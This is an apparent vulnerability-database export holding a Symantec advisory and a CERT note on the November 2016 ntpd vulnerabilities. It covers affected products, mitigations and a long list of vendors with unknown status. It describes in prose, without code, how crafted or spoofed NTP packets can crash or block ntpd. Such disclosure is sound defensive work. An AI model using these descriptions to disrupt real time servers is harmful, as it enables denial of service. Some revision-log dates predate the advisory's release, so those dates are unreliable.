CVE-2016-7427, CVE-2016-7428, CVE-2016-7434, CVE-2016-9310, and CVE-2016-9311.\n\nBy default, Security Analytics does not enable unrestricted rate limiting, NTP broadcast mode, and remote querying in the NTP daemon. The Security Analytics NTP daemon also does not listen by default on multiple network interfaces. Customers who leave these NTP features disabled prevent attacks against Security Analytics using CVE-2016-7426, CVE-2016-7427, CVE-2016-7428, CVE-2016-7429, CVE-2016-7434, CVE-2016-9310, and CVE-2016-9311.\n\nBy default, XOS does not enable unrestricted rate limiting and remote querying in the NTP daemon. Customers who leave this behavior unchanged prevent attacks against XOS using CVE-2016-7426, CVE-2016-9310, and CVE-2016-9311. 
\n \n\n\n### REFERENCES\n\nNTP.org Security Notice - <https://support.ntp.org/bin/view/Main/SecurityNotice#November_2016_ntp_4_2_8p9_NTP_Se> \nVulnerability Note VU#633847 - [http://www.kb.cert.org/vuls/id/633847](<https://www.kb.cert.org/vuls/id/633847>) \n \n\n\n### REVISION \n\n2020-04-26 Advanced Secure Gateway (ASG) 7.1 and later versions are not vulnerable because a fix is available in 7.1.1.1. Advisory status changed to Closed. \n2019-10-02 Web Isolation is not vulnerable. \n2019-08-10 SSLV 3.x has a vulnerable version of the NTP reference implementation, but is not vulnerable to known vectors of attack. \n2019-08-07 A fix for ASG 6.6 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-01-21 Security Analytics 8.0 is not vulnerable because a fix is available in SA 8.0.1. \n2019-01-12 A fix for Security Analytics 7.1 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-01-11 A fix for CA 2.1 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-08-07 A fix for CA 1.3 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-06-25 A fix for SSLV 3.11 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-04-26 A fix for SSLV 4.0 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-04-25 A fix for XOS 9.7 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-04-22 CAS 2.3 is not vulnerable. Reporter 10.1 prior to 10.1.5.5 is vulnerable to CVE-2016-7429, CVE-2016-7431, and CVE-2016-7433. Reporter 10.2 is not vulnerable because a fix is available in 10.2.1.1. \n2018-01-31 A fix for ASG 6.7 is available in 6.7.3.1. \n2017-11-16 A fix for SSLV 3.9 will not be provided. Please upgrade to a later version with the vulnerability fixes. 
\n2017-11-09 MC 1.11 is not vulnerable because a fix is available in 1.11.1.1. A fix for MC 1.10 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-11-08 CA 2.2 is not vulnerable because a fix is available in 2.2.1.1. \n2017-11-06 ASG 6.7 has a vulnerable version of the NTP reference implementation, but is not vulnerable to known vectors of attack. \n2017-08-03 SSLV 4.1 is not vulnerable because a fix is available in 4.1.1.1. \n2017-03-30 MC 1.10 is vulnerable to CVE-2016-7431 and CVE-2016-7433. It also has a vulnerable version of the NTP reference implementation for CVE-2016-7426, CVE-2016-7429, CVE-2016-9310, CVE-2016-9311, and CVE-2016-9312 but is not vulnerable to known vectors of attack. A fix for MC 1.9 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-06-22 Security Analytics 7.3 is not vulnerable. \n2016-06-10 Corrected advisory to say that SSLV 3.9, 3.10, and 3.11 are not vulnerable to CVE-2016-7431. Also, CA, MC, and SSLV are not vulnerable to known vectors of attack for CVE-2016-9312. SSLV 3.8.4FC is vulnerable to CVE-2016-7433. SSLV 3.8.4FC also has a vulnerable version of the ntp.org NTP reference implementation for CVE-2016-7426, CVE-2016-9310, CVE-2016-9311, and CVE-2016-9312, but is not vulnerable to known vectors of attack. \n2017-05-29 A fix for Security Analytics 6.6 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-05-18 CAS 2.1 is vulnerable to CVE-2016-7429, CVE-2016-7431, CVE-2016-7433, and CVE-2016-9312. \n2017-04-30 A fix for Director 6.1 is available in 6.1.23.1. \n2017-03-30 MC 1.9 is vulnerable to CVE-2016-7431, CVE-2016-7433, and CVE-2016-9312. \n2017-03-09 A fix for Security Analytics 7.2 is available in 7.2.3. \n2017-03-08 SSLV 4.0 is vulnerable to CVE-2016-7431, CVE-2016-7433, and CVE-2016-9312. 
\n2017-01-12 initial public release \n2016-01-23 Added CVSS v2 base scores from National Vulnerability Database (NVD)\n", "modified": "2020-04-26T14:52:52", "published": "2017-01-12T08:00:00", "id": "SMNTC-1393", "href": "", "type": "symantec", "title": "SA139 : November 2016 NTP Security Vulnerabilities", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:19", "bulletinFamily": "info", "cvelist": ["CVE-2016-7426", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-7429", "CVE-2016-7431", "CVE-2016-7433", "CVE-2016-7434", "CVE-2016-9310", "CVE-2016-9311", "CVE-2016-9312"], "description": "### Overview \n\nNTP.org ntpd versions ntp-4.2.7p385 up to but not including ntp-4.2.8p9 and ntp-4.3.0 up to but not including ntp-4.3.94 contain multiple denial of service vulnerabilities.\n\n### Description \n\nNTP.org's ntpd, versions ntp-4.2.7p385 up to but not including ntp-4.2.8p9 and ntp-4.3.0 up to but not including ntp-4.3.94, contain multiple denial of service vulnerabilities.\n\n[**CWE-476**](<http://cwe.mitre.org/data/definitions/476.html>)**: NULL Pointer Dereference - **CVE-2016-9311 \n \nAccording to NTP.org, \"ntpd does not enable trap service by default. If trap service has been explicitly enabled, an attacker can send a specially crafted packet to cause a null pointer dereference that will crash ntpd, resulting in a denial of service. Affects Windows only.\" \n \n[**CWE-400**](<http://cwe.mitre.org/data/definitions/400.html>)**: Uncontrolled Resource Consumption ('Resource Exhaustion') - **CVE-2016-9310 \n \nAccording to NTP.org, \"An exploitable configuration modification vulnerability exists in the control mode (mode 6) functionality of ntpd. If, against long-standing BCP recommendations, \"restrict default noquery ...\" is not specified, a specially crafted control mode packet can set ntpd traps, providing information disclosure and DDoS amplification, and unset ntpd traps, disabling legitimate monitoring. 
A remote, unauthenticated, network attacker can trigger this vulnerability.\" \n \n[**CWE-400**](<http://cwe.mitre.org/data/definitions/400.html>)**: Uncontrolled Resource Consumption ('Resource Exhaustion') - **CVE-2016-7427 \n \nAccording to NTP.org, \"The broadcast mode of NTP is expected to only be used in a trusted network. If the broadcast network is accessible to an attacker, a potentially exploitable denial of service vulnerability in ntpd's broadcast mode replay prevention functionality can be abused. An attacker with access to the NTP broadcast domain can periodically inject specially crafted broadcast mode NTP packets into the broadcast domain which, while being logged by ntpd, can cause ntpd to reject broadcast mode packets from legitimate NTP broadcast servers.\" \n \n \n[**CWE-400**](<http://cwe.mitre.org/data/definitions/400.html>)**: Uncontrolled Resource Consumption ('Resource Exhaustion') - **CVE-2016-7428 \n \nAccording to NTP.org, \"The broadcast mode of NTP is expected to only be used in a trusted network. If the broadcast network is accessible to an attacker, a potentially exploitable denial of service vulnerability in ntpd's broadcast mode poll interval enforcement functionality can be abused. To limit abuse, ntpd restricts the rate at which each broadcast association will process incoming packets. ntpd will reject broadcast mode packets that arrive before the poll interval specified in the preceding broadcast packet expires. 
An attacker with access to the NTP broadcast domain can send specially crafted broadcast mode NTP packets to the broadcast domain which, while being logged by ntpd, will cause ntpd to reject broadcast mode packets from legitimate NTP broadcast servers.\" \n \n[**CWE-410**](<http://cwe.mitre.org/data/definitions/410.html>)**: Insufficient Resource Pool - **CVE-2016-9312 \n \nAccording to NTP.org, \"If a vulnerable instance of ntpd on Windows receives a crafted malicious packet that is \"too big\", ntpd will stop working.\" \n \n[**CWE-20**](<http://cwe.mitre.org/data/definitions/20.html>)**: Improper Input Validation - **CVE-2016-7431 \n \nAccording to NTP.org, \"Zero Origin timestamp problems were fixed by Bug 2945 in ntp-4.2.8p6. However, subsequent timestamp validation checks introduced a regression in the handling of some Zero origin timestamp checks.\" \n \n[**CWE-20**](<http://cwe.mitre.org/data/definitions/20.html>)**: Improper Input Validation - **CVE-2016-7434 \n \nAccording to NTP.org, \"If ntpd is configured to allow mrulist query requests from a server that sends a crafted malicious packet, ntpd will crash on receipt of that crafted malicious mrulist query packet.\" \n \n[**CWE-605**](<http://cwe.mitre.org/data/definitions/605.html>)**: Multiple Binds to the Same Port -** CVE-2016-7429 \n \nAccording to NTP.org, \"When ntpd receives a server response on a socket that corresponds to a different interface than was used for the request, the peer structure is updated to use the interface for new requests. If ntpd is running on a host with multiple interfaces in separate networks and the operating system doesn't check source address in received packets (e.g. 
rp_filter on Linux is set to 0), an attacker that knows the address of the source can send a packet with spoofed source address which will cause ntpd to select wrong interface for the source and prevent it from sending new requests until the list of interfaces is refreshed, which happens on routing changes or every 5 minutes by default. If the attack is repeated often enough (once per second), ntpd will not be able to synchronize with the source.\" \n \n[**CWE-410**](<http://cwe.mitre.org/data/definitions/410.html>)**: Insufficient Resource Pool - **CVE-2016-7426 \n \nAccording to NTP.org, \"When ntpd is configured with rate limiting for all associations (restrict default limited in ntp.conf), the limits are applied also to responses received from its configured sources. An attacker who knows the sources (e.g., from an IPv4 refid in server response) and knows the system is (mis)configured in this way can periodically send packets with spoofed source address to keep the rate limiting activated and prevent ntpd from accepting valid responses from its sources.\" \n \n[**CWE-682**](<http://cwe.mitre.org/data/definitions/682.html>)**: Incorrect Calculation - **CVE-2016-7433 \n \nAccording to NTP.org, \"Bug 2085 described a condition where the root delay was included twice, causing the jitter value to be higher than expected. Due to a misinterpretation of a small-print variable in The Book, the fix for this problem was incorrect, resulting in a root distance that did not include the peer dispersion. The calculations and formulae have been reviewed and reconciled, and the code has been updated accordingly.\" \n \nFor more information, please see NTP.org's [security advisory](<http://support.ntp.org/bin/view/Main/SecurityNotice#November_2016_ntp_4_2_8p9_NTP_Se>). \n \nThe CVSS score below is based on CVE-2016-9312. 
\n \n--- \n \n### Impact \n\nA remote unauthenticated attacker may be able to perform a denial of service on ntpd. \n \n--- \n \n### Solution \n\n**Implement BCP-38.** \n \nUse \"`restrict default noquery ...`\" in your `ntp.conf` file. Only allow mode 6 queries from trusted networks and hosts. \n \n**Apply an update** \n \nUpgrade to [4.2.8p9](<nwtime.org/ntp428p9_release>), or later, from the NTP Project Download Page or the NTP Public Services Project Download Page. \n \n**Monitor ntpd** \n \nProperly monitor your ntpd instances, and auto-restart ntpd (without -g) if it stops running. \n \n--- \n \n### Vendor Information\n\n### NTP Project Affected\n\nUpdated: November 18, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### CoreOS Not Affected\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n**Statement Date: November 21, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`CoreOS Container Linux, by default, is not affected by this since ntpd is disabled.`\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ACCESS Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### AT&T Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Alcatel-Lucent Unknown\n\nNotified: November 21, 2016 Updated: 
November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Apple Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Arch Linux Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Arista Networks, Inc. Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Aruba Networks Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Avaya, Inc. Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Barracuda Networks Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Belkin, Inc. 
Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Blue Coat Systems Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Brocade Communication Systems Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### CA Technologies Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### CMX Systems Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### CentOS Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Check Point Software Technologies Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Cisco Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Contiki OS Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### D-Link Systems, Inc. 
Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Debian GNU/Linux Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### DesktopBSD Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### DragonFly BSD Project Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### EMC Corporation Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### EfficientIP SAS Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Enterasys Networks Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Ericsson Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### European Registry for Internet Domains Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Extreme Networks Unknown\n\nNotified: 
November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### F5 Networks, Inc. Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fedora Project Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Force10 Networks Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fortinet, Inc. Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Foundry Brocade Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### FreeBSD Project Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### GNU adns Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### GNU glibc Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Gentoo Linux Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### 
Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Google Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hardened BSD Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hewlett Packard Enterprise Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hitachi Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Huawei Technologies Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### IBM Corporation Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Infoblox Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Intel Corporation Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Internet Systems Consortium Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor 
Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Internet Systems Consortium - DHCP Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### JH Software Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Juniper Networks Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Lenovo Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Lynx Software Technologies Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### McAfee Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Microchip Technology Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Microsoft Corporation Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### NEC Corporation Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not 
received a statement from the vendor.\n\n### Vendor References\n\n### NLnet Labs Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### NetBSD Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Nokia Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Nominum Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OmniTI Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OpenBSD Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OpenDNS Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Oracle Corporation Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Oryx Embedded 
Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Peplink Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### PowerDNS Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Q1 Labs Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### QNX Software Systems Inc. Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Quadros Systems Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Red Hat, Inc. 
Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Rocket RTOS Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SUSE Linux Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SafeNet Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Secure64 Software Corporation Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Slackware Linux Inc. 
Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### SmoothWall Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Snort Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sony Corporation Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sourcefire Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Symantec Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### TCPWave Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### TippingPoint Technologies Inc. 
Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Tizen Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### TrueOS Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Turbolinux Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Ubuntu Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Unisys Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### VMware Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Wind River Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### WizNET Technology Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Xilinx Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor 
